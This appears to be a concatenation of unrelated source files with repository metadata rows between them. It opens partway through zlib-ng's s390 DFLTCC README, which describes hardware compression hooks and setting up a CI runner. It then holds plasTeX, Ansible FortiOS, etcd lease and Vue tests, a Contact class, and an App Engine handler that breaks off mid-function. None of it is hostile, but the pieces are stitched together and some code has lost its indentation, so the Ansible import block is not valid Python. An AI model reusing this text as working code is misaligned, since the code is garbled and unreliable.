https://github.com/iii-i/zlib-ng/wiki/Performance-with-dfltcc-patch-applied-and-dfltcc-support-built-on-dfltcc-enabled-machine
). The compression speed-up can be as high as 110x and the decompression
speed-up can be as high as 15x.
# Limitations
Two DFLTCC compression calls with identical inputs are not guaranteed to
produce identical outputs. Therefore care should be taken when using
hardware compression when reproducible results are desired. In
particular, zlib-ng-specific `zng_deflateSetParams` call allows setting
`Z_DEFLATE_REPRODUCIBLE` parameter, which disables DFLTCC support for a
particular stream.
DFLTCC does not support every single zlib-ng feature, in particular:
* `inflate(Z_BLOCK)` and `inflate(Z_TREES)`
* `inflateMark()`
* `inflatePrime()`
* `inflateSyncPoint()`
When used, these functions will either switch to software, or, in case
this is not possible, gracefully fail.
# Code structure
All SystemZ-specific code lives in `arch/s390` directory and is
integrated with the rest of zlib-ng using hook macros.
## Hook macros
DFLTCC takes as arguments a parameter block, an input buffer, an output
buffer, and a window. Parameter blocks are stored alongside zlib states;
buffers are forwarded from the caller; and window - which must be
4k-aligned and is always 64k large, is managed using the `PAD_WINDOW()`,
`WINDOW_PAD_SIZE`, `HINT_ALIGNED_WINDOW` and `DEFLATE_ADJUST_WINDOW_SIZE()`
and `INFLATE_ADJUST_WINDOW_SIZE()` hooks.
Software and hardware window formats do not match, therefore,
`deflateSetDictionary()`, `deflateGetDictionary()`, `inflateSetDictionary()`
and `inflateGetDictionary()` need special handling, which is triggered using
`DEFLATE_SET_DICTIONARY_HOOK()`, `DEFLATE_GET_DICTIONARY_HOOK()`,
`INFLATE_SET_DICTIONARY_HOOK()` and `INFLATE_GET_DICTIONARY_HOOK()` macros.
`deflateResetKeep()` and `inflateResetKeep()` update the DFLTCC
parameter block using `DEFLATE_RESET_KEEP_HOOK()` and
`INFLATE_RESET_KEEP_HOOK()` macros.
`INFLATE_PRIME_HOOK()`, `INFLATE_MARK_HOOK()` and
`INFLATE_SYNC_POINT_HOOK()` macros make the respective unsupported
calls gracefully fail.
`DEFLATE_PARAMS_HOOK()` implements switching between hardware and
software compression mid-stream using `deflateParams()`. Switching
normally entails flushing the current block, which might not be possible
in low memory situations. `deflateParams()` uses `DEFLATE_DONE()` hook
in order to detect and gracefully handle such situations.
The algorithm implemented in hardware has different compression ratio
than the one implemented in software. `DEFLATE_BOUND_ADJUST_COMPLEN()`
and `DEFLATE_NEED_CONSERVATIVE_BOUND()` macros make `deflateBound()`
return the correct results for the hardware implementation.
Actual compression and decompression are handled by `DEFLATE_HOOK()` and
`INFLATE_TYPEDO_HOOK()` macros. Since inflation with DFLTCC manages the
window on its own, calling `updatewindow()` is suppressed using
`INFLATE_NEED_UPDATEWINDOW()` macro.
In addition to compression, DFLTCC computes CRC-32 and Adler-32
checksums, therefore, whenever it's used, software checksumming is
suppressed using `DEFLATE_NEED_CHECKSUM()` and `INFLATE_NEED_CHECKSUM()`
macros.
While software always produces reproducible compression results, this
is not the case for DFLTCC. Therefore, zlib-ng users are given the
ability to specify whether or not reproducible compression results
are required. While it is always possible to specify this setting
before the compression begins, it is not always possible to do so in
the middle of a deflate stream - the exact conditions for that are
determined by `DEFLATE_CAN_SET_REPRODUCIBLE()` macro.
## SystemZ-specific code
When zlib-ng is built with DFLTCC, the hooks described above are
converted to calls to functions, which are implemented in
`arch/s390/dfltcc_*` files. The functions can be grouped in three broad
categories:
* Base DFLTCC support, e.g. wrapping the machine instruction - `dfltcc()`.
* Translating between software and hardware data formats, e.g.
`dfltcc_deflate_set_dictionary()`.
* Translating between software and hardware state machines, e.g.
`dfltcc_deflate()` and `dfltcc_inflate()`.
The functions from the first two categories are fairly simple, however,
various quirks in both software and hardware state machines make the
functions from the third category quite complicated.
### `dfltcc_deflate()` function
This function is called by `deflate()` and has the following
responsibilities:
* Checking whether DFLTCC can be used with the current stream. If this
is not the case, then it returns `0`, making `deflate()` use some
other function in order to compress in software. Otherwise it returns
`1`.
* Block management and Huffman table generation. DFLTCC ends blocks only
when explicitly instructed to do so by the software. Furthermore,
whether to use fixed or dynamic Huffman tables must also be determined
by the software. Since looking at data in order to gather statistics
would negate performance benefits, the following approach is used: the
first `DFLTCC_FIRST_FHT_BLOCK_SIZE` bytes are placed into a fixed
block, and every next `DFLTCC_BLOCK_SIZE` bytes are placed into
dynamic blocks.
* Writing EOBS. Block Closing Control bit in the parameter block
instructs DFLTCC to write EOBS, however, certain conditions need to be
met: input data length must be non-zero or Continuation Flag must be
set. To put this in simpler terms, DFLTCC will silently refuse to
write EOBS if this is the only thing that it is asked to do. Since the
code has to be able to emit EOBS in software anyway, in order to avoid
tricky corner cases Block Closing Control is never used. Whether to
write EOBS is instead controlled by `soft_bcc` variable.
* Triggering block post-processing. Depending on flush mode, `deflate()`
must perform various additional actions when a block or a stream ends.
`dfltcc_deflate()` informs `deflate()` about this using
`block_state *result` parameter.
* Converting software state fields into hardware parameter block fields,
and vice versa. For example, `wrap` and Check Value Type or `bi_valid`
and Sub-Byte Boundary. Certain fields cannot be translated and must
persist untouched in the parameter block between calls, for example,
Continuation Flag or Continuation State Buffer.
* Handling flush modes and low-memory situations. These aspects are
quite intertwined and pervasive. The general idea here is that the
code must not do anything in software - whether explicitly by e.g.
calling `send_eobs()`, or implicitly - by returning to `deflate()`
with certain return and `*result` values, when Continuation Flag is
set.
* Ending streams. When a new block is started and flush mode is
`Z_FINISH`, Block Header Final parameter block bit is used to mark
this block as final. However, sometimes an empty final block is
needed, and, unfortunately, just like with EOBS, DFLTCC will silently
refuse to do this. The general idea of DFLTCC implementation is to
rely as much as possible on the existing code. Here in order to do
this, the code pretends that it does not support DFLTCC, which makes
`deflate()` call a software compression function, which writes an
empty final block. Whether this is required is controlled by
`need_empty_block` variable.
* Error handling. This is simply converting
Operation-Ending-Supplemental Code to string. Errors can only happen
due to things like memory corruption, and therefore they don't affect
the `deflate()` return code.
### `dfltcc_inflate()` function
This function is called by `inflate()` from the `TYPEDO` state (that is,
when all the metadata is parsed and the stream is positioned at the type
bits of deflate block header) and it's responsible for the following:
* Falling back to software when flush mode is `Z_BLOCK` or `Z_TREES`.
Unfortunately, there is no way to ask DFLTCC to stop decompressing on
block or tree boundary.
* `inflate()` decompression loop management. This is controlled using
the return value, which can be either `DFLTCC_INFLATE_BREAK` or
`DFLTCC_INFLATE_CONTINUE`.
* Converting software state fields into hardware parameter block fields,
and vice versa. For example, `whave` and History Length or `wnext` and
History Offset.
* Ending streams. This instructs `inflate()` to return `Z_STREAM_END`
and is controlled by `last` state field.
* Error handling. Like deflate, error handling comprises
Operation-Ending-Supplemental Code to string conversion. Unlike
deflate, errors may happen due to bad inputs, therefore they are
propagated to `inflate()` by setting `mode` field to `MEM` or `BAD`.
# Testing
Given complexity of DFLTCC machine instruction, it is not clear whether
QEMU TCG will ever support it. At the time of writing, one has to have
access to an IBM z15+ VM or LPAR in order to test DFLTCC support. Since
DFLTCC is a non-privileged instruction, neither special VM/LPAR
configuration nor root are required.
zlib-ng CI uses an IBM-provided z15 self-hosted builder for the DFLTCC
testing. There is no official IBM Z GitHub Actions runner, so we build
one inspired by `anup-kodlekere/gaplib`.
Future updates to actions-runner might need an updated patch. The .net
version number patch has been separated into a separate file to avoid a
need for constantly changing the patch.
## Configuring the builder.
### Install prerequisites.
```
sudo dnf install podman
```
### Add actions-runner service.
```
sudo cp self-hosted-builder/actions-runner.service /etc/systemd/system/
sudo systemctl daemon-reload
```
### Create a config file, needs github personal access token.
```
# Create file /etc/actions-runner
repo=<owner>/<name>
access_token=<ghp_***>
```
Access token should have the repo scope, consult
https://docs.github.com/en/rest/reference/actions#create-a-registration-token-for-a-repository
for details.
### Autostart actions-runner.
```
$ sudo systemctl enable --now actions-runner
```
## Rebuilding the container
In order to update the `gaplib-actions-runner` podman container, e.g. to get the
latest OS security fixes, follow these steps:
```
# Stop actions-runner service
sudo systemctl stop actions-runner
# Delete old container
sudo podman container rm gaplib-actions-runner
# Delete old image
sudo podman image rm localhost/zlib-ng/actions-runner
# Build image
sudo podman build --squash -f Dockerfile.zlib-ng --tag zlib-ng/actions-runner .
# Build container
sudo podman create --name=gaplib-actions-runner --env-file=/etc/actions-runner --init --interactive --volume=actions-runner-temp:/home/actions-runner zlib-ng/actions-runner
# Start actions-runner service
sudo systemctl start actions-runner
``` | unknown | github | https://github.com/opencv/opencv | 3rdparty/zlib-ng/arch/s390/README.md |
#!/usr/bin/env python
import unittest, sys
from unittest import TestCase
from plasTeX.Tokenizer import *
from plasTeX.TeX import *
class Numbers(TestCase):
    """Tests for plasTeX's reading of TeX decimals, dimensions and glue."""

    # Tolerance for dimension comparisons.
    fuzz = 1e-3

    def _dimen(self, src):
        """Parse *src* with a fresh TeX instance and return the dimension read."""
        s = TeX()
        s.input(src)
        return s.readDimen()

    def _glue(self, src):
        """Parse *src* with a fresh TeX instance and return the glue read."""
        s = TeX()
        s.input(src)
        return s.readGlue()

    def _assertClose(self, actual, expected):
        """Two-sided tolerance check.

        The original assertions used the one-sided form
        ``actual - expected < fuzz``, which can never fail when *actual*
        undershoots *expected*; abs() catches deviations in both directions.
        """
        assert abs(actual - expected) < self.fuzz, actual

    def testReadDecimal(self):
        for src, expected in [(r'-1.0', -1), (r'-11234.0', -11234), (r'0.0', 0)]:
            s = TeX()
            s.input(src)
            i = s.readDecimal()
            assert i == expected, 'expected %s, but got %s' % (expected, i)

    def testReadDimen(self):
        self._assertClose(self._dimen(r'3 in').inch, 3)
        self._assertClose(self._dimen(r'29 pc').pc, 29)
        self._assertClose(self._dimen(r'-.013837in').inch, -0.013837)
        self._assertClose(self._dimen(r'+ 42,1 dd').dd, 42.1)
        self._assertClose(self._dimen(r'0.mm').mm, 0)
        self._assertClose(self._dimen(r'123456789sp').sp, 123456789)

    def testReadDimen2(self):
        # Forms such as "'.77pt" and '"Ccc' are illegal TeX and deliberately
        # not exercised here.
        i = self._dimen(r'-,sp')
        assert i.sp == 0, i.sp

    def testUnitConversion(self):
        self._assertClose(self._dimen(r'1 pc').pt, 12)
        self._assertClose(self._dimen(r'1 in').pt, 72.27)
        self._assertClose(self._dimen(r'72 bp').inch, 1)
        self._assertClose(self._dimen(r'2.54 cm').inch, 1)
        self._assertClose(self._dimen(r'10 mm').cm, 1)
        self._assertClose(self._dimen(r'1157 dd').pt, 1238)
        self._assertClose(self._dimen(r'1 cc').dd, 12)
        self._assertClose(self._dimen(r'65536 sp').pt, 1)

    def testReadGlue(self):
        i = self._glue(r'0pt plus 1fil')
        assert i.pt == 0, i.pt
        assert i.stretch.fil == 1, i.stretch.fil
        assert i.shrink is None, i.shrink

        i = self._glue(r'0pt plus 1fill')
        assert i.pt == 0, i.pt
        assert i.stretch.fil == 1, i.stretch.fil
        assert i.shrink is None, i.shrink

        i = self._glue(r'0pt plus 1fil minus 1 fil')
        assert i.pt == 0, i.pt
        assert i.stretch.fil == 1, i.stretch.fil
        assert i.shrink.fil == 1, i.shrink.fil

        i = self._glue(r'0pt plus -1fil')
        assert i.pt == 0, i.pt
        assert i.stretch.fil == -1, i.stretch.fil
        assert i.shrink is None, i.shrink

    def testReadGlue2(self):
        i = self._glue(r'6pt plus 2pt minus 2pt')
        assert i.pt == 6, i.pt
        assert i.stretch.pt == 2, i.stretch.pt
        assert i.shrink.pt == 2, i.shrink.pt

        # Three consecutive glue specs followed by a control sequence; the
        # reader must stop at the right boundaries and leave \foo unread.
        t = TeX()
        t.input(r'6pt plus 2pt minus 2pt 1.2pt plus -1.fil-1.234pt\foo')
        i = t.readGlue()
        j = t.readGlue()
        k = t.readGlue()
        assert i.pt == 6, i.pt
        assert i.stretch.pt == 2, i.stretch.pt
        assert i.shrink.pt == 2, i.shrink.pt
        # (the original message printed i.pt here by mistake)
        assert j.pt == 1.2, j.pt
        assert j.stretch.fil == -1, j.stretch.fil
        assert j.shrink is None
        assert k.pt == -1.234, k.pt
        assert k.stretch is None
        assert k.shrink is None
        tokens = list(t.itertokens())
        assert tokens == [EscapeSequence('foo')], tokens
class Parameters(TestCase):
    """Tests that TeX parameters can be copied (and scaled) into new registers.

    The original nine near-identical test bodies are collapsed into one
    parameterized helper.
    """

    def _checkScaled(self, newcmd, param, coeff, factor):
        r"""Register ``\foo`` via *newcmd*, assign ``<coeff>\<param>`` to it
        and verify the stored value equals *factor* times the parameter value.

        *coeff* is the literal coefficient text placed before the parameter
        name ('' for a plain copy); *factor* is its numeric value, or None for
        a plain copy.
        """
        t = TeX()
        t.input('\\%s\\foo\\foo=%s\\%s' % (newcmd, coeff, param))
        t.parse()
        foo = t.ownerDocument.context['foo'].value
        base = t.ownerDocument.context[param].value
        expected = base if factor is None else factor * base
        assert foo == expected, '"%s" != "%s"' % (foo, expected)

    def testParameters(self):
        self._checkScaled('newcount', 'tolerance', '', None)
        self._checkScaled('newcount', 'tolerance', '7', 7)
        self._checkScaled('newcount', 'tolerance', '-3', -3)

    def testDimenParameters(self):
        self._checkScaled('newdimen', 'hsize', '', None)
        self._checkScaled('newdimen', 'hsize', '7.6', 7.6)
        self._checkScaled('newdimen', 'hsize', '-4', -4)

    def testGlueParameters(self):
        self._checkScaled('newskip', 'baselineskip', '', None)
        self._checkScaled('newskip', 'baselineskip', '7.6', 7.6)
        self._checkScaled('newskip', 'baselineskip', '-4', -4)
if __name__ == '__main__':
    # Allow the test suite to be executed directly as a script.
    unittest.main()
# Copyright 2019 Fortinet, Inc.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <https://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import json
import pytest
from mock import ANY
from ansible.module_utils.network.fortios.fortios import FortiOSHandler
try:
from ansible.modules.network.fortios import fortios_router_access_list6
except ImportError:
pytest.skip("Could not load required modules for testing", allow_module_level=True)
@pytest.fixture(autouse=True)
def connection_mock(mocker):
    """Automatically patch the module's Connection class for every test."""
    patched_connection = mocker.patch('ansible.modules.network.fortios.fortios_router_access_list6.Connection')
    return patched_connection
fos_instance = FortiOSHandler(connection_mock)
def test_router_access_list6_creation(mocker):
    """A 'present' task must POST the payload and report a change on success."""
    schema_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
    set_mock = mocker.patch(
        'ansible.module_utils.network.fortios.fortios.FortiOSHandler.set',
        return_value={'status': 'success', 'http_method': 'POST', 'http_status': 200})

    input_data = {
        'username': 'admin',
        'state': 'present',
        'router_access_list6': {
            'comments': 'test_value_3',
            'name': 'default_name_4',
        },
        'vdom': 'root'}

    is_error, changed, response = fortios_router_access_list6.fortios_router(input_data, fos_instance)

    set_mock.assert_called_with(
        'router', 'access-list6',
        data={'comments': 'test_value_3', 'name': 'default_name_4'},
        vdom='root')
    schema_mock.assert_not_called()
    assert not is_error
    assert changed
    assert response['status'] == 'success'
    assert response['http_status'] == 200
def test_router_access_list6_creation_fails(mocker):
    """An HTTP 500 from the API must surface as an error without a change."""
    schema_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
    set_mock = mocker.patch(
        'ansible.module_utils.network.fortios.fortios.FortiOSHandler.set',
        return_value={'status': 'error', 'http_method': 'POST', 'http_status': 500})

    input_data = {
        'username': 'admin',
        'state': 'present',
        'router_access_list6': {
            'comments': 'test_value_3',
            'name': 'default_name_4',
        },
        'vdom': 'root'}

    is_error, changed, response = fortios_router_access_list6.fortios_router(input_data, fos_instance)

    set_mock.assert_called_with(
        'router', 'access-list6',
        data={'comments': 'test_value_3', 'name': 'default_name_4'},
        vdom='root')
    schema_mock.assert_not_called()
    assert is_error
    assert not changed
    assert response['status'] == 'error'
    assert response['http_status'] == 500
def test_router_access_list6_removal(mocker):
    """An 'absent' task must DELETE by mkey and report a change on success."""
    schema_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
    delete_mock = mocker.patch(
        'ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete',
        return_value={'status': 'success', 'http_method': 'POST', 'http_status': 200})

    input_data = {
        'username': 'admin',
        'state': 'absent',
        'router_access_list6': {
            'comments': 'test_value_3',
            'name': 'default_name_4',
        },
        'vdom': 'root'}

    is_error, changed, response = fortios_router_access_list6.fortios_router(input_data, fos_instance)

    delete_mock.assert_called_with('router', 'access-list6', mkey=ANY, vdom='root')
    schema_mock.assert_not_called()
    assert not is_error
    assert changed
    assert response['status'] == 'success'
    assert response['http_status'] == 200
def test_router_access_list6_deletion_fails(mocker):
    """A failing DELETE must surface as an error without a change."""
    schema_mock = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
    delete_mock = mocker.patch(
        'ansible.module_utils.network.fortios.fortios.FortiOSHandler.delete',
        return_value={'status': 'error', 'http_method': 'POST', 'http_status': 500})

    input_data = {
        'username': 'admin',
        'state': 'absent',
        'router_access_list6': {
            'comments': 'test_value_3',
            'name': 'default_name_4',
        },
        'vdom': 'root'}

    is_error, changed, response = fortios_router_access_list6.fortios_router(input_data, fos_instance)

    delete_mock.assert_called_with('router', 'access-list6', mkey=ANY, vdom='root')
    schema_mock.assert_not_called()
    assert is_error
    assert not changed
    assert response['status'] == 'error'
    assert response['http_status'] == 500
def test_router_access_list6_idempotent(mocker):
    """A 404 'already in desired state' reply must report neither error nor change."""
    mock_schema = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
    mock_set = mocker.patch(
        'ansible.module_utils.network.fortios.fortios.FortiOSHandler.set',
        return_value={'status': 'error', 'http_method': 'DELETE', 'http_status': 404})

    entry = {
        'comments': 'test_value_3',
        'name': 'default_name_4',
    }
    input_data = {
        'username': 'admin',
        'state': 'present',
        'router_access_list6': dict(entry),
        'vdom': 'root'}

    is_error, changed, response = fortios_router_access_list6.fortios_router(input_data, fos_instance)

    # The payload sent to the device must match the entry verbatim.
    mock_set.assert_called_with('router', 'access-list6', data=entry, vdom='root')
    mock_schema.assert_not_called()
    assert not is_error
    assert not changed
    assert response['status'] == 'error'
    assert response['http_status'] == 404
def test_router_access_list6_filter_foreign_attributes(mocker):
    """Attributes unknown to the module must be stripped from the device payload."""
    mock_schema = mocker.patch('ansible.module_utils.network.fortios.fortios.FortiOSHandler.schema')
    mock_set = mocker.patch(
        'ansible.module_utils.network.fortios.fortios.FortiOSHandler.set',
        return_value={'status': 'success', 'http_method': 'POST', 'http_status': 200})

    valid = {
        'comments': 'test_value_3',
        'name': 'default_name_4',
    }
    # The input carries one extra, schema-invalid key on top of the valid ones.
    entry = dict(valid)
    entry['random_attribute_not_valid'] = 'tag'
    input_data = {
        'username': 'admin',
        'state': 'present',
        'router_access_list6': entry,
        'vdom': 'root'}

    is_error, changed, response = fortios_router_access_list6.fortios_router(input_data, fos_instance)

    # Only the schema-valid keys may reach the device.
    mock_set.assert_called_with('router', 'access-list6', data=valid, vdom='root')
    mock_schema.assert_not_called()
    assert not is_error
    assert changed
    assert response['status'] == 'success'
    assert response['http_status'] == 200
// Copyright 2022 The etcd Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package common
import (
"context"
"testing"
"time"
"github.com/stretchr/testify/require"
clientv3 "go.etcd.io/etcd/client/v3"
"go.etcd.io/etcd/tests/v3/framework/config"
"go.etcd.io/etcd/tests/v3/framework/testutils"
)
// TestLeaseGrantTimeToLive verifies that TimeToLive reports back exactly the
// TTL that was originally granted for a lease.
func TestLeaseGrantTimeToLive(t *testing.T) {
	testRunner.BeforeTest(t)
	for _, tc := range clusterTestCases() {
		t.Run(tc.name, func(t *testing.T) {
			ctx, cancel := context.WithTimeout(t.Context(), 10*time.Second)
			defer cancel()

			cluster := testRunner.NewCluster(ctx, t, config.WithClusterConfig(tc.config))
			defer cluster.Close()
			client := testutils.MustClient(cluster.Client())

			testutils.ExecuteUntil(ctx, t, func() {
				const grantedTTL = int64(10)
				grantResp, err := client.Grant(ctx, grantedTTL)
				require.NoError(t, err)

				liveResp, err := client.TimeToLive(ctx, grantResp.ID, config.LeaseOption{})
				require.NoError(t, err)
				// The server must echo back exactly the TTL we asked for.
				require.Equal(t, grantedTTL, liveResp.GrantedTTL)
			})
		})
	}
}
// TestLeaseGrantAndList grants zero, one or several leases and verifies that
// listing leases eventually returns exactly the ones that were created.
func TestLeaseGrantAndList(t *testing.T) {
	testRunner.BeforeTest(t)
	for _, tc := range clusterTestCases() {
		// Sub-cases differ only in how many leases are granted up front.
		nestedCases := []struct {
			name       string
			leaseCount int
		}{
			{
				name:       "no_leases",
				leaseCount: 0,
			},
			{
				name:       "one_lease",
				leaseCount: 1,
			},
			{
				name:       "many_leases",
				leaseCount: 3,
			},
		}
		for _, nc := range nestedCases {
			t.Run(tc.name+"/"+nc.name, func(t *testing.T) {
				ctx, cancel := context.WithTimeout(t.Context(), 10*time.Second)
				defer cancel()
				t.Logf("Creating cluster...")
				clus := testRunner.NewCluster(ctx, t, config.WithClusterConfig(tc.config))
				defer clus.Close()
				cc := testutils.MustClient(clus.Client())
				t.Logf("Created cluster and client")
				testutils.ExecuteUntil(ctx, t, func() {
					var createdLeases []clientv3.LeaseID
					for i := 0; i < nc.leaseCount; i++ {
						leaseResp, err := cc.Grant(ctx, 10)
						t.Logf("Grant returned: resp:%s err:%v", leaseResp.String(), err)
						require.NoError(t, err)
						createdLeases = append(createdLeases, leaseResp.ID)
					}
					// Because we're not guaranteed to talk to the same member, wait for
					// listing to eventually return true, either by the result propagating
					// or by hitting an up to date member.
					var leases []clientv3.LeaseStatus
					require.Eventually(t, func() bool {
						resp, err := cc.Leases(ctx)
						if err != nil {
							return false
						}
						leases = resp.Leases
						// TODO: update this to use last Revision from leaseResp
						// after https://github.com/etcd-io/etcd/issues/13989 is fixed
						return len(leases) == len(createdLeases)
					}, 2*time.Second, 10*time.Millisecond)
					// Listing order is not guaranteed, so compare as multisets.
					returnedLeases := make([]clientv3.LeaseID, 0, nc.leaseCount)
					for _, status := range leases {
						returnedLeases = append(returnedLeases, status.ID)
					}
					require.ElementsMatch(t, createdLeases, returnedLeases)
				})
			})
		}
	}
}
// TestLeaseGrantTimeToLiveExpired lets a short lease run out and checks that
// both the lease (TTL == -1) and its attached key are gone afterwards.
func TestLeaseGrantTimeToLiveExpired(t *testing.T) {
	testRunner.BeforeTest(t)
	for _, tc := range clusterTestCases() {
		t.Run(tc.name, func(t *testing.T) {
			ctx, cancel := context.WithTimeout(t.Context(), 15*time.Second)
			defer cancel()
			clus := testRunner.NewCluster(ctx, t, config.WithClusterConfig(tc.config))
			defer clus.Close()
			cc := testutils.MustClient(clus.Client())
			testutils.ExecuteUntil(ctx, t, func() {
				// Grant a 2s lease and attach a key to it.
				leaseResp, err := cc.Grant(ctx, 2)
				require.NoError(t, err)
				_, err = cc.Put(ctx, "foo", "bar", config.PutOptions{LeaseID: leaseResp.ID})
				require.NoError(t, err)
				getResp, err := cc.Get(ctx, "foo", config.GetOptions{})
				require.NoError(t, err)
				require.Equal(t, int64(1), getResp.Count)
				// FIXME: When leader changes, old leader steps
				// back to follower and ignores the lease revoking.
				// The new leader will restart TTL counting. If so,
				// we should call time.Sleep again and wait for revoking.
				// It can't avoid flakey but reduce flakey possibility.
				for i := 0; i < 3; i++ {
					currentLeader := clus.WaitLeader(t)
					t.Logf("[%d] current leader index %d", i, currentLeader)
					// Sleep past the 2s TTL; retry if leadership moved meanwhile.
					time.Sleep(3 * time.Second)
					newLeader := clus.WaitLeader(t)
					if newLeader == currentLeader {
						break
					}
					t.Logf("[%d] leader changed, new leader index %d", i, newLeader)
				}
				// An expired lease reports TTL == -1.
				ttlResp, err := cc.TimeToLive(ctx, leaseResp.ID, config.LeaseOption{})
				require.NoError(t, err)
				require.Equal(t, int64(-1), ttlResp.TTL)
				getResp, err = cc.Get(ctx, "foo", config.GetOptions{})
				require.NoError(t, err)
				// Value should expire with the lease
				require.Equal(t, int64(0), getResp.Count)
			})
		})
	}
}
// TestLeaseGrantKeepAliveOnce renews a short lease once via KeepAliveOnce and
// then inspects its remaining TTL after a sleep.
func TestLeaseGrantKeepAliveOnce(t *testing.T) {
	testRunner.BeforeTest(t)
	for _, tc := range clusterTestCases() {
		t.Run(tc.name, func(t *testing.T) {
			ctx, cancel := context.WithTimeout(t.Context(), 15*time.Second)
			defer cancel()
			clus := testRunner.NewCluster(ctx, t, config.WithClusterConfig(tc.config))
			defer clus.Close()
			cc := testutils.MustClient(clus.Client())
			testutils.ExecuteUntil(ctx, t, func() {
				leaseResp, err := cc.Grant(ctx, 2)
				require.NoError(t, err)
				_, err = cc.KeepAliveOnce(ctx, leaseResp.ID)
				require.NoError(t, err)
				// FIXME: When leader changes, old leader steps
				// back to follower and ignores the lease revoking.
				// The new leader will restart TTL counting. If so,
				// we should call time.Sleep again and wait for revoking.
				// It can't avoid flakey but reduce flakey possibility.
				for i := 0; i < 3; i++ {
					currentLeader := clus.WaitLeader(t)
					t.Logf("[%d] current leader index %d", i, currentLeader)
					time.Sleep(2 * time.Second)
					newLeader := clus.WaitLeader(t)
					if newLeader == currentLeader {
						break
					}
					t.Logf("[%d] leader changed, new leader index %d", i, newLeader)
				}
				ttlResp, err := cc.TimeToLive(ctx, leaseResp.ID, config.LeaseOption{})
				require.NoError(t, err)
				// We still have a lease!
				// NOTE(review): require.Greater(t, a, b) asserts a > b, so this checks
				// 2 > TTL — which also holds for an expired lease (TTL == -1) and thus
				// does not actually prove the lease is alive. If the intent matches the
				// comment above, ttlResp.TTL > 0 seems intended — confirm before changing.
				require.Greater(t, int64(2), ttlResp.TTL)
			})
		})
	}
}
func TestLeaseGrantRevoke(t *testing.T) {
testRunner.BeforeTest(t)
for _, tc := range clusterTestCases() {
t.Run(tc.name, func(t *testing.T) {
ctx, cancel := context.WithTimeout(t.Context(), 10*time.Second)
defer cancel()
clus := testRunner.NewCluster(ctx, t, config.WithClusterConfig(tc.config))
defer clus.Close()
cc := testutils.MustClient(clus.Client())
testutils.ExecuteUntil(ctx, t, func() {
leaseResp, err := cc.Grant(ctx, 20)
require.NoError(t, err)
_, err = cc.Put(ctx, "foo", "bar", config.PutOptions{LeaseID: leaseResp.ID})
require.NoError(t, err)
getResp, err := cc.Get(ctx, "foo", config.GetOptions{})
require.NoError(t, err)
require.Equal(t, int64(1), getResp.Count)
_, err = cc.Revoke(ctx, leaseResp.ID)
require.NoError(t, err)
ttlResp, err := cc.TimeToLive(ctx, leaseResp.ID, config.LeaseOption{})
require.NoError(t, err)
require.Equal(t, int64(-1), ttlResp.TTL)
getResp, err = cc.Get(ctx, "foo", config.GetOptions{})
require.NoError(t, err)
// Value should expire with the lease
require.Equal(t, int64(0), getResp.Count)
})
})
}
} | go | github | https://github.com/etcd-io/etcd | tests/common/lease_test.go |
import { toHandlers } from '../../src/helpers/toHandlers'
describe('toHandlers', () => {
it('should not accept non-objects', () => {
toHandlers(null as any)
toHandlers(undefined as any)
expect(
'v-on with no argument expects an object value.',
).toHaveBeenWarnedTimes(2)
})
it('should properly change object keys', () => {
const input = () => {}
const change = () => {}
expect(toHandlers({ input, change })).toStrictEqual({
onInput: input,
onChange: change,
})
})
}) | typescript | github | https://github.com/vuejs/core | packages/runtime-core/__tests__/helpers/toHandlers.spec.ts |
from sys import maxsize
class Contact:
    """Value object for a single address-book contact.

    Equality compares first/last name, treating a missing id on either side
    as a wildcard so freshly-created contacts match their stored counterparts.
    """

    def __init__(self, firstname=None, middlename=None, lastname=None, nickname=None, title=None, company=None,
                 address=None, telhome=None, telmobile=None, telwork=None, fax=None, email=None, email2=None,
                 email3=None, homepage=None, birth=None, anniversary=None, address2=None, home2=None, notes=None,
                 id=None, all_phones_from_home_page=None, all_emails_from_home_page=None):
        # Copy every constructor argument onto the instance under the same name.
        for name, value in list(locals().items()):
            if name != "self":
                setattr(self, name, value)

    def __repr__(self):
        return "{}:{}:{}".format(self.id, self.firstname, self.lastname)

    def __eq__(self, other):
        # A missing id on either side acts as a wildcard for the id check.
        same_id = self.id is None or other.id is None or self.id == other.id
        return same_id and (self.firstname, self.lastname) == (other.firstname, other.lastname)

    def id_or_max(self):
        """Return the numeric id, or maxsize so id-less contacts sort last."""
        return int(self.id) if self.id else maxsize
#!/usr/bin/python2.4
#
# Copyright 2011 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Handler for providing a list of files for the client to download."""
import logging
from django.utils import simplejson
from google.appengine.ext import webapp
from google.appengine.ext.webapp.util import run_wsgi_app
from handlers import base
CLIENT_FILE_LIST = '/client_file_list'
class ClientFileList(base.BaseHandler):
  """Handler to provide a list of files for the client to download."""

  # Disable 'Invalid method name' lint error.
  # pylint: disable-msg=C6409
  def get(self):
    """Provides a list of files to download and execute."""
    # Files the client should fetch, and the subset it should then execute.
    downloads = ['bots_client_bundle.zip', 'browser_install_bundle.zip',
                 'webdriver_content_script.js']
